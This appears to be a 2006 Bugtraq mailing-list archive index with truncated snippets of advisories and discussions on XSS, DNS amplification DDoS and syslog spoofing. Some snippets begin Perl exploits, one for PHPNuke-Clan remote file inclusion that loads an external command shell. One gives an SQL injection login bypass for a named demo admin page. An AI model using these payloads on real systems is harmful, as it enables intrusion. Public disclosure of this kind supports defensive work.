Mis-diagnosed XSS bugs hiding worse issues due to PHP feature

2006-04-01 Thread Steven M. Christey
In a post-disclosure analysis [1] of a security issue announced by rgod [2], Siegfried observed that the reported XSS actually originated from a file inclusion vulnerability, in which the XSS was reflected back from an error message when the file inclusion failed: About the xss, it is an xss in

linksubmit = All version Html Tag Injector in index.php

2006-04-01 Thread ali
Vendor : linksubmit Version : All Version www : http://www.phpselect.com AUTHOR : s3rv3r_hack3r you can submit html tag's in $description (linksubmit.php) Exploit : #!/usr/bin/perl # # Exploit by s3rv3r_hack3r # Special Thanx : hessamx , f0rk ,sattar.li , stanic, mfox,blood moon and..

Re: recursive DNS servers DDoS as a growing DDoS problem

2006-04-01 Thread Gadi Evron
Geo. wrote: The flood is a flood of answers not queries, you spoof the source address of a query with the address of your target, the target gets the response from the dns server. A cache on the dns server just makes it a more efficient response. Queries are bad enough. This can be played with

Re: [Full-disclosure] Mis-diagnosed XSS bugs hiding worse issues due to PHP feature

2006-04-01 Thread Siegfried
About that xss, it was really a normal xss, like i wrote in my second post (i respect rgod's work because he always made good analysis and good advisories). But there are indeed many vulnerabilities that are classified as XSS while they were much more than a XSS, or a XSS in a PHP error message.

FleXiBle Development Script Remote Command Exucetion And XSS Attacking

2006-04-01 Thread botan
Description : /* = File created by Andries Bruinsma (c) FleXiBle Development (FXB) Web: http://www.ahbruinsma.nl Email: [EMAIL PROTECTED] === File: main.php Version: 3.0 Date started: 10th

Re: Re: Re: phpBB 2.06 search.php SQL injection

2006-04-01 Thread theguywhocouldwipeyourphpBB
Using 2.06 is a guaranteed ticket to your web site being hacked. phpBB is at 2.19 at the moment and there have been major security flaws found in each previous version - including 2.06 Patch your 2.06 up to 2.19 or die... because there are bots out there that are looking for lazy web admins

DoS-ing sysklogd?

2006-04-01 Thread Milen Rangelov
Hello, Bugtraq, I am not quite sure this hasn't been already discussed before, if so, please excuse me... There were quite a lot of DNS DoS-ing with spoofed udp-related messages here recently. What I'd like to discuss is something similar in concept - a denial of service via spoofing the source

PHPNuke-Clan 3.0.1 Remote File Inclusion Exploit

2006-04-01 Thread uid0
#!/usr/bin/perl ## # PHPNuke-Clan 3.0.1 Remote File Inclusion Exploit # Bug Found By uid0 code by zod ## # (c) 2006 # ExploiterCode.com ## # usage: # perl pnc.pl location of PNC cmd shell location cmd shell variable # # perl pnc.pl http://site.com/PNC/ http://site.com/cmd.txt cmd # # cmd shell

GeSWall 2.2 – Free Intrusion Prevention System for Windows

2006-04-01 Thread GentleSecurity Team
Hello Bugtraq, we would like to announce the recent GeSWall update. GeSWall is an intrusion prevention system for Windows. It applies a security policy that effectively precludes damage from various attacks and malicious software. Instead of blocking particular attack techniques GeSWall focuses

Re: recursive DNS servers DDoS as a growing DDoS problem

2006-04-01 Thread Paul Stepowski
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Stephen Samuel wrote: | To put it another way: UDP as a purely connectionless | protocol is fast becoming a liability in situations where | significant amplification is possible. My thoughts exactly. This attack is possible because of a design

SiteMan = All version SQL injection in admin_login.asp

2006-04-01 Thread ali
Vendor : SiteMan Target Page : admin_login.asp Bug Finder : S3rv3r_hack3r administrator panel (demo): http://www.ispdemos.com/Demo/SiteMan/admin_login.asp WWW : http://www.ispofegypt.com/ you can login to admin_login.asp with user : admin pass : ' or '